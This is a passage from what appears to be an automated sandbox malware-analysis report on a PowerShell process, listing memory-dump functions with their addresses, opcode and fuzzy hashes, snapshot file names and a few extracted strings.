                                                                                                                                              • Instruction Fuzzy Hash: B9314978D042299FEB40DFAAC8483EEBBF2AF89301F04806AD415BB341D77849558F99
                                                                                                                                              Function 03424F48 Relevance: .1, Instructions: 77COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2681477869.0000000003420000.00000040.00000800.00020000.00000000.sdmp, Offset: 03420000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_3420000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 54eed0f93de2118f448bc984a1265aad70fc2142111d28374c2aaf922ef3832c
                                                                                                                                              • Instruction ID: b755ed37ba5f799d4bd4ccc77ef9853c17e9ae8f7aa19279239ed30727a0076b
                                                                                                                                              • Opcode Fuzzy Hash: 54eed0f93de2118f448bc984a1265aad70fc2142111d28374c2aaf922ef3832c
                                                                                                                                              • Instruction Fuzzy Hash: 72316978901218DFD740EFA9C0487AEBFF2FB84308F1181AAC415AF340D7784A85CB59
                                                                                                                                              Function 03424F58 Relevance: .1, Instructions: 74COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2681477869.0000000003420000.00000040.00000800.00020000.00000000.sdmp, Offset: 03420000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_3420000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e9343e403b4777afde2a3dd2ad90f765c0d62604befe998416ed851952464c5a
                                                                                                                                              • Instruction ID: 2baea6d3055bbdc3536a90559d0c9b97ae3964d6e4bcfacd92a7b6ae7347ff25
                                                                                                                                              • Opcode Fuzzy Hash: e9343e403b4777afde2a3dd2ad90f765c0d62604befe998416ed851952464c5a
                                                                                                                                              • Instruction Fuzzy Hash: 2B313878901218DFD740EFA9C1487AEBFF2FB88309F5185AAD415AF340D7784A858B59
                                                                                                                                              Function 0342FE28 Relevance: .1, Instructions: 68COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2681477869.0000000003420000.00000040.00000800.00020000.00000000.sdmp, Offset: 03420000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_3420000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: eb6935fe032bef83172c311483e377b24d3773688b4c7cb4d6516b9dc5a9946b
                                                                                                                                              • Instruction ID: 795dcb62debff0c86f3201c1e098bc3094f7045fd988f9b6c00a6e5de5665b65
                                                                                                                                              • Opcode Fuzzy Hash: eb6935fe032bef83172c311483e377b24d3773688b4c7cb4d6516b9dc5a9946b
                                                                                                                                              • Instruction Fuzzy Hash: 13216A74E05229CFDB05DFA9D4182EEBBF5FB88300F90802AD415BB345DB740A49CBA4
                                                                                                                                              Function 04F07653 Relevance: .1, Instructions: 66COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2687838595.0000000004F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_4f00000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 305123894311dac165eccfdad71be21873d5d29d06ec50d7aa49bc60390b0268
                                                                                                                                              • Instruction ID: 797f5d21451f2071c635de8b9bf757f033ceb651e5678195fdd637249122c3cf
                                                                                                                                              • Opcode Fuzzy Hash: 305123894311dac165eccfdad71be21873d5d29d06ec50d7aa49bc60390b0268
                                                                                                                                              • Instruction Fuzzy Hash: 3421E474A002199FCB04DF59C9849AAFBF1FB88310B2585A9E809EB751C731FD91CBA0
                                                                                                                                              Function 0342A3D8 Relevance: .1, Instructions: 62COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2681477869.0000000003420000.00000040.00000800.00020000.00000000.sdmp, Offset: 03420000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_3420000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 581e997ec74190c361b6d9036d1f1a86b70d152731b4ab7d57d2c4ee7d564c6e
                                                                                                                                              • Instruction ID: 0d5091041216a44df20ff94dbe1c647356ec8e9e23b436a923a1d7c4127f6f56
                                                                                                                                              • Opcode Fuzzy Hash: 581e997ec74190c361b6d9036d1f1a86b70d152731b4ab7d57d2c4ee7d564c6e
                                                                                                                                              • Instruction Fuzzy Hash: 93213675D011198FCB04CFA9D8486EEBFB6EB88310F14906AD815B7310DB385A45CBA4
                                                                                                                                              Function 04F06E38 Relevance: .1, Instructions: 62COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2687838595.0000000004F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_4f00000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8493061ffcbbcd182161c4f73aea7a6ef4a7c6899b12a61563f516187436fc16
                                                                                                                                              • Instruction ID: 9f3b3d681de27285f8c9143dc1d19542a029d5663a2ae82d47b056a8f32fd547
                                                                                                                                              • Opcode Fuzzy Hash: 8493061ffcbbcd182161c4f73aea7a6ef4a7c6899b12a61563f516187436fc16
                                                                                                                                              • Instruction Fuzzy Hash: B6215C78A442058FC741EF78D98199EBBB2FF84300B5485A9D1058B77ADB71E9858BD0
                                                                                                                                              Function 0342A3E8 Relevance: .1, Instructions: 58COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2681477869.0000000003420000.00000040.00000800.00020000.00000000.sdmp, Offset: 03420000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_3420000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5dfba03f3e60c7107cafa6b36919d963a90de2a494897db82324c0e00c391229
                                                                                                                                              • Instruction ID: 14109910d5738fed89d72a53c1e67c40221bf3a97b991098246ec35e38b51bd5
                                                                                                                                              • Opcode Fuzzy Hash: 5dfba03f3e60c7107cafa6b36919d963a90de2a494897db82324c0e00c391229
                                                                                                                                              • Instruction Fuzzy Hash: B8112674D01229CFCB04DFA9D9486EEFFF6EB88310F54902AD915B7210DB349A45CBA4
                                                                                                                                              Function 07BFADC0 Relevance: .1, Instructions: 51COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ddc0f294600e3344c749349ed7e73689c9ab3cb4c4608a98c3d14dc361278455
                                                                                                                                              • Instruction ID: 42ac6ecc73d87cf7a7fc693520e6c7f4aaf9205f99db1f847c56a3f9a527a4e3
                                                                                                                                              • Opcode Fuzzy Hash: ddc0f294600e3344c749349ed7e73689c9ab3cb4c4608a98c3d14dc361278455
                                                                                                                                              • Instruction Fuzzy Hash: A7015BB4700101DFF718CA09C480E22F7EAEBC6B25F29C0AADA1D4B651C771EC46CB50
                                                                                                                                              Function 04F09506 Relevance: .0, Instructions: 50COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2687838595.0000000004F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_4f00000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b6b97ba9c806db3c9a5838779b13a6a9c4283a5824e9f9b2ab2564373a0d4855
                                                                                                                                              • Instruction ID: 5e104e564168f6cfd49d1922a9c3b57f001c96a375dd4dead4c9b8e8206bce0f
                                                                                                                                              • Opcode Fuzzy Hash: b6b97ba9c806db3c9a5838779b13a6a9c4283a5824e9f9b2ab2564373a0d4855
                                                                                                                                              • Instruction Fuzzy Hash: 3711E775A04209EFCB05CF98D884E9DBBB2EF88310F28C154E404AB3A5D771E882DB90
                                                                                                                                              Function 07BFADC8 Relevance: .0, Instructions: 47COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b5c68941c1529b2a6043b32528022e4f2d0aedbcc48ae98fe36791244e7cca65
                                                                                                                                              • Instruction ID: 04718c0547d22fe1a251334b0e1966e61e20089527084d7b6fb3a9f80d64eecd
                                                                                                                                              • Opcode Fuzzy Hash: b5c68941c1529b2a6043b32528022e4f2d0aedbcc48ae98fe36791244e7cca65
                                                                                                                                              • Instruction Fuzzy Hash: 1C0129B5700111DFE718CA09C480E16F7EAEBD6B25F28C49ADA1D4B651C772EC46C750
                                                                                                                                              Function 034CD006 Relevance: .0, Instructions: 45COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2683219014.00000000034CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 034CD000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_34cd000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8a4ec124f333ca61a00ce358cb6d1c508de276251154553b6ed035d04304d824
                                                                                                                                              • Instruction ID: 85f14826a9bf9cbaf226bb2248e5b045c97ad2ae911b56795c4aadaf5a33f9c7
                                                                                                                                              • Opcode Fuzzy Hash: 8a4ec124f333ca61a00ce358cb6d1c508de276251154553b6ed035d04304d824
                                                                                                                                              • Instruction Fuzzy Hash: BC01407140E3C09ED7128B25CC94B56BFB4EF43224F1D81DBD8888F2A3C2699848C772
                                                                                                                                              Function 034CD01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2683219014.00000000034CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 034CD000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_34cd000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e88edd51db9040fb91392a1456a4778c1f4ae6509c9137ba2b526c1aeae39126
                                                                                                                                              • Instruction ID: b8aef87c6d8f22156e330dd0c6ca93c5000d389f23a803501849a966f976b048
                                                                                                                                              • Opcode Fuzzy Hash: e88edd51db9040fb91392a1456a4778c1f4ae6509c9137ba2b526c1aeae39126
                                                                                                                                              • Instruction Fuzzy Hash: 0801DF358083809AE7508A2ECD84B67BF98EF42328F0CC57EEC184E246C2799842C6B5
                                                                                                                                              Function 0342A1B0 Relevance: .0, Instructions: 33COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2681477869.0000000003420000.00000040.00000800.00020000.00000000.sdmp, Offset: 03420000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_3420000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4bdae30759caba52309d9c40b13412bfd90ed69be5d41fb97b728489e443bd8c
                                                                                                                                              • Instruction ID: 9cbc5c68978a3be8a3ce2090a91881660d5fddd4df1ba5a005360920dc905244
                                                                                                                                              • Opcode Fuzzy Hash: 4bdae30759caba52309d9c40b13412bfd90ed69be5d41fb97b728489e443bd8c
                                                                                                                                              • Instruction Fuzzy Hash: FDF09074D0520CAFCB81DFA8D8406ACFFB5EB48310F10C1AAAC1897341EA355F45DB40
                                                                                                                                              Function 04F06E48 Relevance: .0, Instructions: 28COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2687838595.0000000004F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_4f00000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1f207bacbbad97b1c076a625bee27dc4bc13f6d43016685515bd36c572090e08
                                                                                                                                              • Instruction ID: 3775f6351d083d5bc914c9253fd9509c9fd604e78a197a657b9ab25563d79c13
                                                                                                                                              • Opcode Fuzzy Hash: 1f207bacbbad97b1c076a625bee27dc4bc13f6d43016685515bd36c572090e08
                                                                                                                                              • Instruction Fuzzy Hash: ADF09774E0020A8FC780DF68C485AAEBBF0BF49210F5051A9D509DB321E730A995CB91
                                                                                                                                              Function 0342A1C0 Relevance: .0, Instructions: 24COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2681477869.0000000003420000.00000040.00000800.00020000.00000000.sdmp, Offset: 03420000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_3420000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5c1a2c96906d0f4bbdd996cd08c48f615ed46640cc70e8a69398813cd3d73b77
                                                                                                                                              • Instruction ID: 1ad264813709b4659192e4126b30dccf28252141d9c858eb05af8bc9618f0ed3
                                                                                                                                              • Opcode Fuzzy Hash: 5c1a2c96906d0f4bbdd996cd08c48f615ed46640cc70e8a69398813cd3d73b77
                                                                                                                                              • Instruction Fuzzy Hash: DFF0A574E05208EFCB84DFA8D540AADFFB5EB48310F10C1AAAC18A7351DA359A51DF44
                                                                                                                                              Function 0342FDE8 Relevance: .0, Instructions: 19COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2681477869.0000000003420000.00000040.00000800.00020000.00000000.sdmp, Offset: 03420000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_3420000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 253f2a6ecfe54e796f237c4f6b4770db4f7d2427284f6014dfb44695ea568f6b
                                                                                                                                              • Instruction ID: 25cda91cd9c431a14419d30abf1df64e200fcbad1995ceaf5da5210d6952de13
                                                                                                                                              • Opcode Fuzzy Hash: 253f2a6ecfe54e796f237c4f6b4770db4f7d2427284f6014dfb44695ea568f6b
                                                                                                                                              • Instruction Fuzzy Hash: C8E08C34909208EBC704DFA4E5415ACFFB8EB45304F94819DDC0827342CB315E06CB84
                                                                                                                                              Function 03429088 Relevance: .0, Instructions: 18COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2681477869.0000000003420000.00000040.00000800.00020000.00000000.sdmp, Offset: 03420000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_3420000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: eb5e8e815dac6df30125346bbd593b386b398c08be02f68099e4e2145ca738b5
                                                                                                                                              • Instruction ID: 6c88e859dd3f83275a890b65b43dafd78ef3ce2a2a73c6a8092c090967e212b6
                                                                                                                                              • Opcode Fuzzy Hash: eb5e8e815dac6df30125346bbd593b386b398c08be02f68099e4e2145ca738b5
                                                                                                                                              • Instruction Fuzzy Hash: FFD0C22140AA480FC391E7E0DE193657FA09B02209F08018BE0889A1A2CA740018C72E
                                                                                                                                              Function 03429098 Relevance: .0, Instructions: 11COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2681477869.0000000003420000.00000040.00000800.00020000.00000000.sdmp, Offset: 03420000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_3420000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 23059ecc151f4b53b16928321a7108d4535ef7278dc3f04afd5d130dd748ea70
                                                                                                                                              • Instruction ID: 0e7ba012683b3b05b27f2f1a9d45fd3ba4275ab913444e7754314762cefc1143
                                                                                                                                              • Opcode Fuzzy Hash: 23059ecc151f4b53b16928321a7108d4535ef7278dc3f04afd5d130dd748ea70
                                                                                                                                              • Instruction Fuzzy Hash: 91C08C31102B0C46C240B7E4A20A379BAA8AB02219F84010AF14D681114EB40010C17E
                                                                                                                                              Function 03424DFC Relevance: .0, Instructions: 6COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2681477869.0000000003420000.00000040.00000800.00020000.00000000.sdmp, Offset: 03420000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_3420000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 93759dbe16dc22a3aa3316afbddc1d9013549366f63ba2c35e6696e581cca599
                                                                                                                                              • Instruction ID: a46ee2f787da425a3c86e795c4fea4056b4dc98242b6dba0183338218e12ea5b
                                                                                                                                              • Opcode Fuzzy Hash: 93759dbe16dc22a3aa3316afbddc1d9013549366f63ba2c35e6696e581cca599
                                                                                                                                              • Instruction Fuzzy Hash: 2BB012E010354056C7009690C540480AF503A9315830441C8D4A805042CB115722D340

                                                                                                                                              Non-executed Functions

                                                                                                                                              Function 03429278 Relevance: 7.2, Strings: 5, Instructions: 956COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2681477869.0000000003420000.00000040.00000800.00020000.00000000.sdmp, Offset: 03420000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_3420000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: TJcq$Te^q$pbq$q*.e$xbaq
                                                                                                                                              • API String ID: 0-1541586077
                                                                                                                                              • Opcode ID: 9b4415b9072e26703635fb3c06fe430883fc7c13a7b0e7794019f55228ab6eb1
                                                                                                                                              • Instruction ID: 559422c8244ab2077ba146e4c98d585aa607d0ddcff5449968b94a70e89eef65
                                                                                                                                              • Opcode Fuzzy Hash: 9b4415b9072e26703635fb3c06fe430883fc7c13a7b0e7794019f55228ab6eb1
                                                                                                                                              • Instruction Fuzzy Hash: F9A2A575E00228CFDB65CF69C984A99BBB2FF89304F1581D9E509AB325DB319E91CF40
                                                                                                                                              Function 075287D0 Relevance: 6.4, Strings: 5, Instructions: 156COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2719835908.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7520000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4'^q$4'^q$4Td%(Sd%$XTd%pTd%$dTd%LTd%@Td%
                                                                                                                                              • API String ID: 0-1854310358
                                                                                                                                              • Opcode ID: f57b46fca81896f7a919e7ea1977f04ed4e52154822d0437e4b4ee7b1696329d
                                                                                                                                              • Instruction ID: 71fb2fca160239011975375e4d30a1bc35f182a7908970188fb96cf830d91d63
                                                                                                                                              • Opcode Fuzzy Hash: f57b46fca81896f7a919e7ea1977f04ed4e52154822d0437e4b4ee7b1696329d
                                                                                                                                              • Instruction Fuzzy Hash: 32615C74A426448FD708DF7AE99469ABBF3EBC8204F14C63EC0049F369EB7954099B51
                                                                                                                                              Function 075287E0 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2719835908.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7520000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4'^q$4'^q$4Td%(Sd%$XTd%pTd%$dTd%LTd%@Td%
                                                                                                                                              • API String ID: 0-1854310358
                                                                                                                                              • Opcode ID: 1040822d8b23c06d79bf29f836ea089a3841a06d25321ea6179a361a24e52b77
                                                                                                                                              • Instruction ID: 8ea522460e212bf73ac74f0a366c85484f9ab1c3328b6d8748c079e1ff879620
                                                                                                                                              • Opcode Fuzzy Hash: 1040822d8b23c06d79bf29f836ea089a3841a06d25321ea6179a361a24e52b77
                                                                                                                                              • Instruction Fuzzy Hash: 34513B74A426448FD708DF7AE99469ABBF3FBC8204F14C63EC1049F369EB3964099B51
                                                                                                                                              Function 03429268 Relevance: 4.0, Strings: 3, Instructions: 247COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2681477869.0000000003420000.00000040.00000800.00020000.00000000.sdmp, Offset: 03420000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_3420000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: TJcq$Te^q$xbaq
                                                                                                                                              • API String ID: 0-3225726259
                                                                                                                                              • Opcode ID: 468007c8f914c9c35f86d857b88630c0c85a15f349596c45a184e6007541f76a
                                                                                                                                              • Instruction ID: 6741f494b5e5f45c35c3b4725d9ec62a5e69a77b9b93f456aaf81efd58e42bc3
                                                                                                                                              • Opcode Fuzzy Hash: 468007c8f914c9c35f86d857b88630c0c85a15f349596c45a184e6007541f76a
                                                                                                                                              • Instruction Fuzzy Hash: 5AC17775E016588FDB58CF6AD944ADDBBF2BF89300F14C1AAD809AB365DB305A81CF50
                                                                                                                                              Function 077F7878 Relevance: 3.9, Strings: 3, Instructions: 192COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2721872316.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: HE~%$\J~%$dbq
                                                                                                                                              • API String ID: 0-1421790848
                                                                                                                                              • Opcode ID: fb1391d05f3939adce7c533092737af89549c3130f4d6cbfb033cc0e31f2bf7c
                                                                                                                                              • Instruction ID: 2a92409c318327d62ec72093001d7ed2c09949c663cbfcbf3ffb9e94464145e1
                                                                                                                                              • Opcode Fuzzy Hash: fb1391d05f3939adce7c533092737af89549c3130f4d6cbfb033cc0e31f2bf7c
                                                                                                                                              • Instruction Fuzzy Hash: 108135B8915218CFDB08DFA8D544BEDBBF2FB89304F508269D109AB355DB385949CF84
                                                                                                                                              Function 077F7888 Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2721872316.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: HE~%$\J~%$dbq
                                                                                                                                              • API String ID: 0-1421790848
                                                                                                                                              • Opcode ID: 9d57ad9509fc075e8faebb756072ac0c83c37d7efbf6b38ae0284397a729c11a
                                                                                                                                              • Instruction ID: 4ffd64966575042f180234b248285fdccf9f20e87831faecefa9c090d4ef7460
                                                                                                                                              • Opcode Fuzzy Hash: 9d57ad9509fc075e8faebb756072ac0c83c37d7efbf6b38ae0284397a729c11a
                                                                                                                                              • Instruction Fuzzy Hash: C38144B8915218CFDB08DFA8D544BEDBBF2FB4A300F50826AD109AB355DB385949CF84
                                                                                                                                              Function 03425091 Relevance: 2.7, Strings: 2, Instructions: 170COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2681477869.0000000003420000.00000040.00000800.00020000.00000000.sdmp, Offset: 03420000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_3420000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4'^q$4'^q
                                                                                                                                              • API String ID: 0-2697143702
                                                                                                                                              • Opcode ID: 6960529281aa5f47865337ca4d4e9ff80a533566652a9ec565c9285f86ea37d0
                                                                                                                                              • Instruction ID: 0d97f6d2a3e3dcf0781c283a9931408e0c6f4aa33fc6983e4669397ca079b9b4
                                                                                                                                              • Opcode Fuzzy Hash: 6960529281aa5f47865337ca4d4e9ff80a533566652a9ec565c9285f86ea37d0
                                                                                                                                              • Instruction Fuzzy Hash: 0B71C9B4A012188FD749DF6AE98069DBBF3FF88304F14C62AD5049F369EF74584A9B41
                                                                                                                                              Function 034250A0 Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2681477869.0000000003420000.00000040.00000800.00020000.00000000.sdmp, Offset: 03420000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_3420000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4'^q$4'^q
                                                                                                                                              • API String ID: 0-2697143702
                                                                                                                                              • Opcode ID: 09e1683c37c5f31e5e991caa29a8d0a321be4fa56309aa5b333f654bbb917c37
                                                                                                                                              • Instruction ID: 052f1edc54748fac7fd19ab070bb71fb10c3de435aec97fea3831afc549282b3
                                                                                                                                              • Opcode Fuzzy Hash: 09e1683c37c5f31e5e991caa29a8d0a321be4fa56309aa5b333f654bbb917c37
                                                                                                                                              • Instruction Fuzzy Hash: D871D8B4A012188FD748DF6AE58069EBBF3FF88304F14C62AD1049F369EF74584A9B41
                                                                                                                                              Function 0342E268 Relevance: 1.4, Strings: 1, Instructions: 199COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2681477869.0000000003420000.00000040.00000800.00020000.00000000.sdmp, Offset: 03420000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
